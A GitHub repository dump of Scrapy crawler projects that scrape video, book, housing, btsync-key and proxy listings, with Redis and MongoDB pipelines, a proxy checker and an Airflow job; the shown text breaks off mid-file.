"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport scrapy\nimport json\n\n\ndef safe_list_get(l, idx, default=''):\n return l[idx] if len(l) > idx else default\n\n\nclass SimpleSpider(scrapy.Spider):\n name = 'Simple'\n allow_domain = ['simple.com']\n\n def __init__(self, url=None, page=None):\n if not url:\n url = 'https://www.simple.com/'\n if not page:\n page = 1\n self.start_url = '%s&p1=%s' % (url, page)\n\n def start_requests(self):\n if self.start_url:\n return [scrapy.Request(\n self.start_url,\n callback=self.parse_item_follow_next_page,\n )]\n\n def parse_item_follow_next_page(self, response):\n lis = response.xpath('some_xpath_of_list')\n for li in lis:\n item = {}\n title = safe_list_get(li.xpath('./title_xpath/text()').extract(), 0, '')\n item['title'] = title\n # Add other attributes\n yield item\n\n next_page = safe_list_get(response.xpath('next_page_xpath').extract(), 0, '')\n if next_page:\n url = response.urljoin(next_page)\n yield scrapy.Request(url, callback=self.parse_item_follow_next_page)\n"
},
{
"alpha_fraction": 0.5676813721656799,
"alphanum_fraction": 0.5793393850326538,
"avg_line_length": 41.88888931274414,
"blob_id": "8c4ce18357edf4bcccc78979bacdc75d46d8461a",
"content_id": "4da0692d6cbe142b9f24526dadc5aa33cb601233",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3088,
"license_type": "permissive",
"max_line_length": 137,
"num_lines": 72,
"path": "/caoporn/caoporn/spiders/list.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport scrapy\nimport pymongo\nimport datetime\nfrom caoporn.items import VideoItem\n\ndef get_default(arr, idx, default_value):\n \"\"\"get arr[idx] or return default_value\n \"\"\"\n try:\n return arr[idx]\n except IndexError:\n return default_value\n\ndef convert_time_len(tl):\n sec = 0\n for x in tl.split(':'):\n sec = sec * 60 + int(x)\n return sec\n\nclass ListSpider(scrapy.Spider):\n name = \"list\"\n allowed_domains = ['caoporn.com', 'caomoo.com', 'caomee.com', '51.caoxee.com', 'cao.vgao.xyz']\n # find from mongo\n start_url = 'http://cao.vgao.xyz/videos?page=1'\n max_page = 5000\n\n def __init__(self, *args, **kwargs):\n self.page_cnt = 0\n self.force = 'force' in kwargs\n\n # checkpoint is always last complete parsing page url, so start with it will\n # repeat parse these items again\n def start_requests(self):\n mongo_uri=self.crawler.settings.get('MONGO_URI')\n mongo_db=self.crawler.settings.get('MONGO_DB')\n client = pymongo.MongoClient(mongo_uri)\n db = client[mongo_db]\n collection_name = 'video'\n newest_videos = db[collection_name].find().sort([('$natural', -1)]).limit(10)\n self.newest_vids = {v['hash'] for v in newest_videos}\n return [scrapy.Request(url=self.start_url, callback=self.parse_video)]\n\n def parse(self, response):\n pass\n\n def parse_video(self, response):\n touch_newest = False\n self.page_cnt += 1\n for vid in response.xpath('//div[@class=\"video_box\"]'):\n item = VideoItem()\n item['name'] = get_default(vid.xpath('a/img/@title').extract(), 0, '')\n item['url'] = response.urljoin(get_default(vid.xpath('a/@href').extract(), 0, ''))\n item['hash'] = vid.xpath('a/@href').re('/video[0-9]*/([0-9a-f]+)/')[0]\n touch_newest = touch_newest or item['hash'] in self.newest_vids\n if not self.force and touch_newest:\n self.log('touch newest @ %s' % item['hash'])\n return\n item['cover'] = response.urljoin(get_default(vid.xpath('a/img/@src').extract(), 0, ''))\n item['length'] = int(convert_time_len(get_default(vid.xpath('div[@class=\"box_left\"]/text()').extract(), 0, '00:00').strip()))\n item['views'] = int(get_default(vid.xpath('div[@class=\"box_right\"]/text()').re('[0-9]+'), 0, 0))\n item['is_hd'], item['is_private'] = False, False\n for img_src in vid.xpath('img/@src').extract():\n item['is_hd'] = item['is_hd'] or 'hd.png' in img_src\n item['is_private'] = item['is_private'] or 'private-video.png' in img_src\n item['_create_time'] = datetime.datetime.now()\n yield item\n\n next_url = response.xpath('//div[@class=\"pagination\"]/ul/li[position()=last()]/a[@class=\"prevnext\"]/@href').extract()\n if len(next_url) > 0 and self.page_cnt < self.max_page:\n self.log('next page is: %s' % next_url[-1])\n yield scrapy.Request(url=next_url[-1], callback=self.parse_video)\n"
},
{
"alpha_fraction": 0.4906832277774811,
"alphanum_fraction": 0.5043478012084961,
"avg_line_length": 32.54166793823242,
"blob_id": "9bb3f6c430d18a075c65310e4afeebf3644540a5",
"content_id": "dab4dfed73e9930691260a16a92ca3d37e8aee1c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 805,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 24,
"path": "/small/small/spiders/btsync.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport scrapy\n\n\nclass BtsyncSpider(scrapy.Spider):\n name = \"btsync\"\n allowed_domains = [\"btsynckeys.com/\"]\n\n def start_requests(self):\n for i in range(0, 621, 10):\n url = 'http://btsynckeys.com/%s' % (i)\n yield scrapy.Request(url, callback=self.parse)\n\n def parse(self, response):\n trs = response.xpath('//table/tbody/tr')\n for tr in trs:\n tds = tr.xpath('./td')\n name, secret, _, create_time, peers = tds\n yield {\n 'name': name.xpath('./text()').extract()[0],\n 'secret': secret.xpath('./text()').extract()[0],\n 'create_time': create_time.xpath('./text()').extract()[0],\n 'peers': peers.xpath('./text()').extract()[0],\n }\n"
},
{
"alpha_fraction": 0.596256673336029,
"alphanum_fraction": 0.596256673336029,
"avg_line_length": 25.714284896850586,
"blob_id": "6be27b079cb69658dd41044d85c5ddeba9b1f861",
"content_id": "e8d95688a4328cfe5a5cfb385a31ae644fd17176",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 374,
"license_type": "permissive",
"max_line_length": 92,
"num_lines": 14,
"path": "/duokan/duokan/dkbson.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "import subprocess\nimport tempfile\nimport sys\n\ndef decode(bytes):\n with tempfile.NamedTemporaryFile(delete=False) as f:\n f.write(bytes)\n f.flush()\n try:\n res = subprocess.check_output('node duokan/decode.js %s' % (f.name), shell=True)\n except Exception as e:\n print(e, file=sys.stderr)\n res = {}\n return res\n"
},
{
"alpha_fraction": 0.5724138021469116,
"alphanum_fraction": 0.5735632181167603,
"avg_line_length": 33.79999923706055,
"blob_id": "c248e8e74c39a705c11fd6dfee776029f75ca43d",
"content_id": "94641ec0d84c4ee49f0f8c000fe32b1cf17df3fa",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 870,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 25,
"path": "/caoporn/caoporn/middlewares/spider.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport pymongo\nfrom scrapy.http import Request\n\nclass CheckPointSpider(object):\n \"\"\"record check point to mongo\"\"\"\n\n collection_name = 'checkpoint'\n def process_spider_output(self, response, result, spider):\n \"\"\"record this page\n \"\"\"\n mongo_uri=spider.crawler.settings.get('MONGO_URI')\n mongo_db=spider.crawler.settings.get('MONGO_DB')\n client = pymongo.MongoClient(mongo_uri)\n db = client[mongo_db]\n def add_field(request, response):\n if isinstance(request, Request):\n db[self.collection_name].update_one(\n {},\n {'$set': {'page_url': response.request.url}},\n upsert=True)\n return True\n ret = [req for req in result if add_field(req, response)]\n client.close()\n return ret\n"
},
{
"alpha_fraction": 0.49494948983192444,
"alphanum_fraction": 0.5310245156288147,
"avg_line_length": 23.678571701049805,
"blob_id": "7c7de7845303c2d66e9fa60b91fbd02822ae80df",
"content_id": "6b86f03c082668fe5b3411627a6ba6a719352e6a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 701,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 28,
"path": "/small/xiaoying/utils.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nimport re\nimport datetime\n\ndef money2float(money):\n # Remove comma(,)\n money = money.replace(',', '')\n g = re.match('([0-9\\.]+)', money)\n if not g:\n return money\n num = float(g.group(1))\n pos = 0\n while True:\n pos = money.find('万', pos+1)\n if pos != -1:\n num *= 1e4\n else:\n break\n return num\n\n\ndef period2timedelta(period):\n g = re.match('(?:([0-9]+)个月)?(?:([0-9]+)天)?', period)\n month = int(g.group(1)) if g.group(1) else 0\n day = int(g.group(2)) if g.group(2) else 0\n if g.group(1) is None and g.group(2) is None:\n return period\n return datetime.timedelta(days=day + month*30)\n\n\n"
},
{
"alpha_fraction": 0.6398515105247498,
"alphanum_fraction": 0.7215346693992615,
"avg_line_length": 25.064516067504883,
"blob_id": "93bd1c7bd0cde02967fa9fba13125c8b76d906e5",
"content_id": "4190bdb8ac8e393ff2c636bd2c144338f20cd6ec",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 808,
"license_type": "permissive",
"max_line_length": 135,
"num_lines": 31,
"path": "/proxy/proxy/settings.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "import datetime\n\n\nBOT_NAME = 'proxySpider'\nDOWNLOAD_DELAY = 2\nDOWNLOAD_TIMEOUT = 7\n\nRETRY_HTTP_CODES = [400, 500, 502, 503, 521]\n\nDOWNLOADER_MIDDLEWARES = {\n 'proxy.downloadermiddlewares.proxy.ProxyMiddleware': 200,\n 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None,\n 'random_useragent.RandomUserAgentMiddleware': 400\n}\nUSER_AGENT = \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36\"\n\nITEM_PIPELINES = {\n 'proxy.pipelines.DuplicatesPipeline': 300,\n 'proxy.pipelines.RedisPipeline': 800,\n}\n\nREDIS_HOST = 'localhost'\nREDIS_PORT = 4149\nREDIS_DB = 0\nREDIS_TEST_DB = 1\nREDIS_SEP = ':'\nNORMAL_S = 'normal'\nGFW_S = 'gfw'\nHOST_S = 'host'\nEXPIRE_PRE = 'expire'\nEXPIRE_DELTA = datetime.timedelta(seconds=60*60*3)\n"
},
{
"alpha_fraction": 0.5043182373046875,
"alphanum_fraction": 0.5252551436424255,
"avg_line_length": 50.635135650634766,
"blob_id": "c6beea79878d102a5d27130b1e254e10c9d1a73e",
"content_id": "d17883608f048bcc6ea2feb54284a7465aa7826d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3861,
"license_type": "permissive",
"max_line_length": 141,
"num_lines": 74,
"path": "/amazon/spiders/list.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport datetime\nimport scrapy\nfrom amazon.items import BookItem\n\n\ndef safe_list_get(l, idx, default=''):\n return l[idx] if len(l) > idx else default\n\n\nclass AmazonSpider(scrapy.Spider):\n name = \"amazon\"\n allowed_domains = [\"amazon.cn\"]\n cat = None\n start_url = None\n start_urls = {\n '文学巨匠': 'https://www.amazon.cn/s/?node=1851470071&ie=UTF8',\n '外国文学': 'https://www.amazon.cn/s/?node=1851471071&ie=UTF8',\n '秋乏冬眠': 'https://www.amazon.cn/s/?node=1851472071&ie=UTF8',\n '文艺青年': 'https://www.amazon.cn/s/?node=1851473071&ie=UTF8',\n '诺贝尔奖': 'https://www.amazon.cn/s/?node=1851474071&ie=UTF8',\n }\n\n def __init__(self, cat=None, url=None, node=None):\n if cat is None:\n self.cat = datetime.datetime.today().strftime('%Y%m%d')\n if node or url:\n if url:\n self.start_url = url\n else:\n self.start_url = 'https://www.amazon.cn/s/?node=%s' % (node)\n\n def start_requests(self):\n if self.cat and self.start_url:\n return [scrapy.Request(\n self.start_url,\n meta={'category': self.cat},\n callback=self.parse_book_follow_next_page\n )]\n\n def parse_book_follow_next_page(self, response):\n lis = response.xpath('//ul[contains(@class, \"s-result-list\")]/li') or \\\n response.xpath('//div[contains(@class, \"s-result-list\")]/div[contains(@class, \"s-result-item\")]')\n for li in lis:\n item = BookItem()\n item['title'] = safe_list_get(li.xpath('.//h2/@data-attribute').extract() or \\\n li.xpath('.//h2//span/text()').extract(),\n 0, '')\n if item['title'] == '':\n continue\n item['date'] = safe_list_get(li.xpath('.//div[@class=\"a-row a-spacing-none\"][1]/span/text()').extract(), 0, 'Unknown')\n item['author'] = safe_list_get(li.xpath('.//div[@class=\"a-row a-spacing-none\"][2]/span/text()').extract(), 0, 'Unknown')\n item['author_date'] = ''.join(li.xpath('.//div[@class=\"a-row a-size-base a-color-secondary\"][1]/span/text()').extract())\n # price = li.xpath('.//span[contains(@class, \"s-price\")]/text()').extract()\n # if len(price) == 0:\n # price = li.xpath('.//span[contains(@class, \"a-color-price\")]/text()').extract()\n # item['price'] = price[-1] if len(price) > 0 else '-1.0'\n item['price'] = ''.join(li.xpath('.//span[contains(@class, \"price\")]/text()')[-3:].extract())\n item['rating'] = float(safe_list_get(li.xpath('.//i[contains(@class, \"a-icon-star\")]/span/text()').re('[\\d\\.]+'), 0, 0.0))\n item['rating_num'] = int(safe_list_get(li.xpath('.//a[contains(@class, \"a-size-small\")]/text()').re('\\d+') or \\\n li.xpath('.//div[contains(@class,\"a-size-small\")]/span[2]//span/text()').re('\\d+'), 0, 0))\n item['url'] = safe_list_get(li.xpath('.//a[contains(@class, \"s-access-detail-page\")]/@href').extract() or \\\n li.xpath('.//a[contains(@class, \"a-link-normal\")]/@href').extract(), 0, '')\n if self.allowed_domains[0] not in item['url']:\n item['url'] = self.allowed_domains[0] + item['url']\n item['category'] = response.meta['category']\n yield item\n\n next_page = response.xpath('//li[contains(@class, \"a-last\")]/a/@href') or \\\n response.xpath('//a[@id=\"pagnNextLink\"]/@href')\n self.logger.debug(next_page)\n if next_page:\n url = response.urljoin(next_page[0].extract())\n yield scrapy.Request(url, self.parse_book_follow_next_page, meta=response.meta)\n"
},
{
"alpha_fraction": 0.5301204919815063,
"alphanum_fraction": 0.6064257025718689,
"avg_line_length": 14.5625,
"blob_id": "4093a46fd1eb4a0709e987401afe5bd002225b1e",
"content_id": "9145a6ffaaf18e748fac5911e00278db612d5fde",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "TOML",
"length_bytes": 249,
"license_type": "permissive",
"max_line_length": 38,
"num_lines": 16,
"path": "/Pipfile",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "[[source]]\nurl = \"https://pypi.python.org/simple\"\nverify_ssl = true\nname = \"pypi\"\n\n[packages]\nscrapy = \">=1.6.0\"\nselenium = \">=3.141.0\"\nipython = \">=7.2.0\"\npymongo = \">=3.7.2\"\nsimplejson = \">=3.16\"\n\n[dev-packages]\n\n[requires]\npython_version = \"3.7\"\n"
},
{
"alpha_fraction": 0.5382803082466125,
"alphanum_fraction": 0.6784452199935913,
"avg_line_length": 35.826087951660156,
"blob_id": "c164e2ec296f388377709cd9a7f936cf245a1c79",
"content_id": "1cbd488283eaba36b7661eccdc2054cc5e325e8e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 909,
"license_type": "permissive",
"max_line_length": 59,
"num_lines": 23,
"path": "/small/xiaoying/test_utils.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nfrom utils import period2timedelta, money2float\nfrom datetime import timedelta as td\n\n\ndef test_money2float():\n assert money2float('81.87万') == 818700.0\n assert money2float('6,000') == 6000.0\n assert money2float('6,683.57') == 6683.57\n assert money2float('6,683.57') == 6683.57\n # assert money2float('6,600亿') == 6600e8\n # assert money2float('6,683亿123万') == 66830123e4\n\n\ndef test_period2timedelta():\n assert period2timedelta('11个月29天') == td(days=29+11*30)\n assert period2timedelta('1个月') == td(days=30)\n assert period2timedelta('29天') == td(days=29)\n assert period2timedelta('0天') == td(days=0)\n assert period2timedelta('0个月0天') == td(days=0)\n assert period2timedelta('0个月10天') == td(days=10)\n assert period2timedelta('3个月0天') == td(days=90)\n assert period2timedelta('不合法时间') == '不合法时间'\n\n\n"
},
{
"alpha_fraction": 0.5609405040740967,
"alphanum_fraction": 0.5638195872306824,
"avg_line_length": 36.21428680419922,
"blob_id": "bd06d760216840aed4bede6585d1638188921f6c",
"content_id": "3acd52765e02fc949c10750e53d8b104d11eafdb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2084,
"license_type": "permissive",
"max_line_length": 111,
"num_lines": 56,
"path": "/duokan/duokan/spiders/list.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport scrapy\nimport logging\nimport glob\nimport csv\nimport http.cookiejar\nimport os\nfrom duokan.spiders.base import BaseSpider, FileSaverMixin\n\n\nlogger = logging.getLogger('duokan')\n\nclass ListSpider(BaseSpider, FileSaverMixin):\n name = 'list'\n\n def __init__(self):\n cj = http.cookiejar.MozillaCookieJar()\n # dump cookie with cookies.txt and save as a file\n cj.load('morefreeze_all.cookie')\n self.cookie = {k.name: k.value for k in cj if k.domain.endswith('duokan.com')}\n self.left_page = {}\n\n def start_requests(self):\n # check _done file to detect whether book is finish\n done_dirs = {os.path.basename(os.path.dirname(dir)) for dir in glob.iglob('url/*/_done')}\n with open('duokan.csv', 'r') as f:\n r = csv.DictReader(f)\n for row in r:\n if row['uuid'] not in done_dirs:\n yield scrapy.Request('http://www.duokan.com/reader/book_info/%s/medium' % (row['uuid']),\n cookies=self.cookie,\n callback=self.parse_book_info)\n\n def parse_book_info(self, response):\n super().parse_book_info(response)\n self.left_page[book_info['book_id']] = len(book_info['pages'])\n\n def parse_page(self, response):\n super().parse_page(response)\n self.left_page[req.meta['book_id']] -= 1\n\n def save_page(self, response):\n req = response.request\n if response.status != 200:\n logger.warning('no page iss, book_id[%s] page_id[%s]' % (req.meta['book_id'], req.meta['page_id']))\n return\n dir = os.path.join('data', req.meta['book_id'])\n with open(os.path.join(dir, req.meta['page_id']), 'wb') as f:\n f.write(response.body)\n\n # def closed(self, reason):\n # for book_id in self.left_page:\n # if self.left_page[book_id] == 0:\n # url_dir = os.path.join('url', book_id)\n # with open(os.path(url_dir, '_done'), 'w') as f:\n # pass\n"
},
{
"alpha_fraction": 0.6545040011405945,
"alphanum_fraction": 0.6898517608642578,
"avg_line_length": 41.780487060546875,
"blob_id": "aea21760259cdda9491f040b043d52a583fd5113",
"content_id": "f847736ef152faa84e531ead715adaa1c8c877c7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1850,
"license_type": "permissive",
"max_line_length": 185,
"num_lines": 41,
"path": "/house/lianjia/load_bj.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nimport json\nimport pandas as pd\n\n\ndata = []\nwith open('bj/bizcircle_110000.json', 'r') as f:\n for line in f:\n data.extend(json.loads(line)['data'])\ndf = pd.DataFrame(data)\ndf.latitude = df.latitude.astype(float)\ndf.longitude = df.longitude.astype(float)\n# 五环到三环之间,西起上地,东到来广营\nlon1 = 116.195017\nlon2 = 116.449957\nlat1 = 39.975562\nlat2 = 40.059\nselected_community = df[(df.avg_unit_price<80000) & (lon1<df.longitude) & (df.longitude<lon2) & (lat1<df.latitude) & (df.latitude<lat2)][['name', 'id', 'avg_unit_price', 'house_count']]\ndata = []\nfor _, row in selected_community.iterrows():\n with open('bj/%s_%s.json' % (row['id'], row['name']), 'r') as f:\n for line in f:\n data.extend(json.loads(line)['data']['list'])\ntotal_house = pd.DataFrame(data)\ntotal_house.price_total = total_house.price_total.astype(float)\ntotal_house.house_area = total_house.house_area.astype(float)\nsubway_data = []\nfor _, row in total_house.iterrows():\n d = row['subway_station'] if not pd.isnull(row['subway_station']) else {}\n subway_data.append(d)\nsubway = pd.DataFrame(subway_data)\nsubway = subway.fillna(0)\n# 将规整后的地铁数据取出\nfor k in subway.keys():\n total_house[k] = subway[k]\nselected_house = total_house[(total_house.price_total<=550) & (total_house.house_area>=75) & (total_house.frame_orientation.str.contains(u'南'))]\n# is_restriction 过滤掉商住两用, is_five 取出满五年的\nselected_house = selected_house[(~ selected_house.tags.str.contains('is_restriction')) & (selected_house.tags.str.contains('is_five'))]\nnear_subway = selected_house[(selected_house.distance_value<=1500) & (selected_house.distance_value>0)]\n# 补上链家的url\nnear_subway['url'] = near_subway.house_code.apply(lambda x: 'http://bj.lianjia.com/ershoufang/%s.html' % (x))\n"
},
{
"alpha_fraction": 0.5474452376365662,
"alphanum_fraction": 0.5568300485610962,
"avg_line_length": 35.88461685180664,
"blob_id": "c78cde56632c8b3bbf7dbf91d8cb1495ecfcd59d",
"content_id": "fb4f14e110fa1d331898cb429040fdba120959eb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 959,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 26,
"path": "/duokan/duokan/spiders/free.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport logging\nimport scrapy\nfrom duokan.spiders.base import BaseSpider, FileSaverMixin\n\nlogger = logging.getLogger('duokan')\n\nclass FreeSpider(BaseSpider, FileSaverMixin):\n name = 'list'\n save_file = True\n\n start_urls = ['http://www.duokan.com/']\n # start_urls = ['http://www.duokan.com/special/10882']\n\n def parse(self, response):\n special = response.css('div.u-aimg>ul>li>a::attr(href)').extract()\n yield scrapy.Request('http://www.duokan.com%s' % (special[0]),\n callback=self.parse2,\n )\n\n def parse2(self, response):\n for book_id in response.css('ul.j-list>li::attr(data-id)').extract():\n yield scrapy.Request('http://www.duokan.com/reader/book_info/%s/medium' % (book_id),\n cookies=self.cookie,\n callback=self.parse_book_info,\n )\n"
},
{
"alpha_fraction": 0.591930091381073,
"alphanum_fraction": 0.5940099954605103,
"avg_line_length": 31.486486434936523,
"blob_id": "98ed444363f720691f571213833625ff3fbdddfe",
"content_id": "e39ee5b63f5b4c47c522cdc06d3c7346d10d17fd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2404,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 74,
"path": "/proxy/proxy/pipelines.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nfrom proxy.checker import ProxyChecker\nfrom scrapy.exceptions import DropItem\nfrom db import RedisPool\nimport settings\n\n\nclass DuplicatesPipeline(object):\n\n \"\"\"check ip whether duplicate with redis\"\"\"\n def __init__(self, redis_host, redis_port, redis_db):\n \"\"\"get a redis connection\n \"\"\"\n self.conn = RedisPool.get_pool(redis_host, redis_port, redis_db)\n\n @classmethod\n def from_crawler(cls, crawler):\n redis_host = crawler.settings.get('REDIS_HOST')\n redis_port = crawler.settings.get('REDIS_PORT')\n redis_db = crawler.settings.get('REDIS_DB')\n return cls(redis_host, redis_port, redis_db)\n\n def process_item(self, item, spider):\n \"\"\"return ip is duplicate or not\n\n :item: crawl item including host port\n :returns: return item or DropItem\n \"\"\"\n if 'ip' not in item:\n raise DropItem('')\n port = item.get('port', 80)\n host = '%s:%s' % (item['ip'], port)\n if self.conn.sismember(settings.HOST_S, host) or self.dup_in_queue(host):\n raise DropItem('%s, cause duplicate' % (host))\n else:\n return item\n\n def dup_in_queue(self, host):\n set_list = [settings.NORMAL_S, settings.GFW_S]\n for set_name in set_list:\n if self.conn.sismember(set_name, host):\n return True\n return False\n\n\nclass RedisPipeline(object):\n \"\"\"If item has 'normal' or 'gfw' then store to redis\n \"\"\"\n def __init__(self, redis_host, redis_port, redis_db):\n \"\"\"get a redis connection\n \"\"\"\n self.conn = RedisPool.get_pool(redis_host, redis_port, redis_db)\n\n @classmethod\n def from_crawler(cls, crawler):\n redis_host = crawler.settings.get('REDIS_HOST')\n redis_port = crawler.settings.get('REDIS_PORT')\n redis_db = crawler.settings.get('REDIS_DB')\n cls.host_s = crawler.settings.get('HOST_S')\n return cls(redis_host, redis_port, redis_db)\n\n \"\"\"save to redis\"\"\"\n def process_item(self, item, spider):\n \"\"\"save to redis and return item\n\n :item: crawl item including host port\n :returns: return item or DropItem\n \"\"\"\n if 'ip' not in item:\n raise DropItem('')\n port = item.get('port', 80)\n host = '%s:%s' % (item['ip'], port)\n self.conn.sadd(self.host_s, host)\n return item\n"
},
{
"alpha_fraction": 0.6451612710952759,
"alphanum_fraction": 0.6619355082511902,
"avg_line_length": 27.703702926635742,
"blob_id": "c4b9c83587468bf961a43856387ba503d7f9dd23",
"content_id": "7cec343ea9e748965e43802588ce2a53f3a4a656",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1550,
"license_type": "permissive",
"max_line_length": 122,
"num_lines": 54,
"path": "/house/lianjia/lj_dag.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nfrom os import path\nfrom airflow import DAG\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.operators.python_operator import BranchPythonOperator\nimport datetime\n\n\ndef need_run(ti, execution_date, **kwargs):\n long_time = datetime.timedelta(days=1, hours=20)\n if ti.start_date and execution_date and ti.start_date - execution_date < long_time:\n return 'run_spider'\n return ''\n\ndir = path.abspath(path.dirname(path.realpath(__file__)))\n\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'start_date': datetime.datetime(2017, 7, 24),\n 'email': ['[email protected]', ],\n 'email_on_failure': True,\n 'email_on_retry': True,\n 'retries': 3,\n 'retry_delay': datetime.timedelta(minutes=5),\n 'queue': 'bash_queue',\n 'provide_context': True,\n 'retry_exponential_backoff': True,\n # 'end_date': datetime.datetime(2017, 1, 1),\n}\n\ndag = DAG('lianjia2', default_args=default_args, schedule_interval='@weekly')\n\n\nonly_run_now = BranchPythonOperator(\n task_id='only_run_now',\n python_callable=need_run,\n dag=dag\n)\nbj_code = 110000\noutput_dir = 'bj{{ ds_nodash }}'\nrun_spider = BashOperator(\n task_id='run_spider',\n bash_command='cd {dir} && ./run.sh {bj_code} \"{output_dir}\" '.format(dir=dir, bj_code=bj_code, output_dir=output_dir),\n dag=dag\n)\n\nimport_db = BashOperator(\n task_id='import_db',\n bash_command='cd {dir} && ./import_db.sh \"{output_dir}\" '.format(dir=dir, output_dir=output_dir),\n dag=dag,\n)\n\nonly_run_now >> run_spider >> import_db\n"
},
{
"alpha_fraction": 0.5603668689727783,
"alphanum_fraction": 0.565629243850708,
"avg_line_length": 29.509174346923828,
"blob_id": "537bf91d6ffa54fc16f1f05f23232e4e92aea003",
"content_id": "dae19d70192f4eb0a5d088ac1d1d345e81da59e8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6651,
"license_type": "permissive",
"max_line_length": 117,
"num_lines": 218,
"path": "/proxy/proxy/checker.py",
"repo_name": "morefreeze/scrapy_projects",
"src_encoding": "UTF-8",
"text": "# coding: utf-8\nimport urllib\nimport urllib2\nimport json\nimport logging\nimport settings\nimport time\nimport datetime\nimport threading\nimport signal\nimport sys\nimport gevent\nfrom gevent.lock import Semaphore\nfrom db import RedisPool, build_key\n\ndef _datetime(d):\n if isinstance(d, datetime.datetime):\n return d\n if isinstance(d, datetime.date):\n return datetime.datetime(d.year, d.month, d.day)\n try:\n n = datetime.datetime.strptime(d, '%Y-%m-%d %H:%M:%S')\n except ValueError:\n try:\n n = datetime.datetime.strptime(d, \"%Y-%m-%d %H:%M:%S.%f\")\n except ValueError:\n try:\n n = datetime.datetime.strptime(d, \"%Y-%m-%d\")\n except ValueError:\n n = datetime.datetime.strptime(d, \"%Y-%m-%d %H:%M\")\n return n\n\nlock = Semaphore()\nclass ProxyChecker(object):\n TIMEOUT = 5\n url_list = []\n ret = {}\n proxy_host = ''\n\n \"\"\"Get from redis and check host\"\"\"\n\n def __init__(self, host, timeout=None):\n self.proxy_host = host\n ph = urllib2.ProxyHandler({'http': host, 'https': host})\n self.opener = urllib2.build_opener(ph)\n if timeout is not None:\n self.TIMEOUT = timeout\n\n def check_url(self, url):\n \"\"\"try to fetch url to judge opener is worked\n\n :url: url to check\n :returns: {succ: True, lag: 10(ms)}\n \"\"\"\n try:\n resp = self.opener.open(url, timeout=self.TIMEOUT)\n logging.debug(resp)\n if resp and resp.code == 200:\n succ = True\n except Exception as e:\n succ = False\n logging.warning('Check url(%s) throught proxy(%s) error: %s' % (url, self.opener.handlers[0].proxies, e))\n # TODO: return lag\n return {'succ': succ}\n\n \"\"\"Check proxy normal throught httpbin.org/ip \"\"\"\n def check_httpbin(self):\n url = 'http://httpbin.org/ip'\n try:\n resp = self.opener.open(url, timeout=self.TIMEOUT)\n resp_body = ''.join(resp.readlines())\n if resp and resp.code == 200 and resp_body:\n return json.loads(resp_body)['origin'] == self.proxy_host.split(':', 2)[0]\n except Exception as e:\n logging.warning('Check url(%s) throught proxy(%s) error: %s' % (url, self.opener.handlers[0].proxies, e))\n return False\n\n \"\"\"Base class of IP pipeline, use for checking IP\"\"\"\n def check_proxy(self):\n \"\"\"return host is valid or not\n \"\"\"\n if not self.check_httpbin():\n return\n threads = []\n self._before_check()\n for index, url in enumerate(self.url_list):\n threads.append(gevent.spawn(self._check, index, url))\n gevent.joinall(threads)\n self._after_check()\n\n def _check(self, index, url):\n ret = 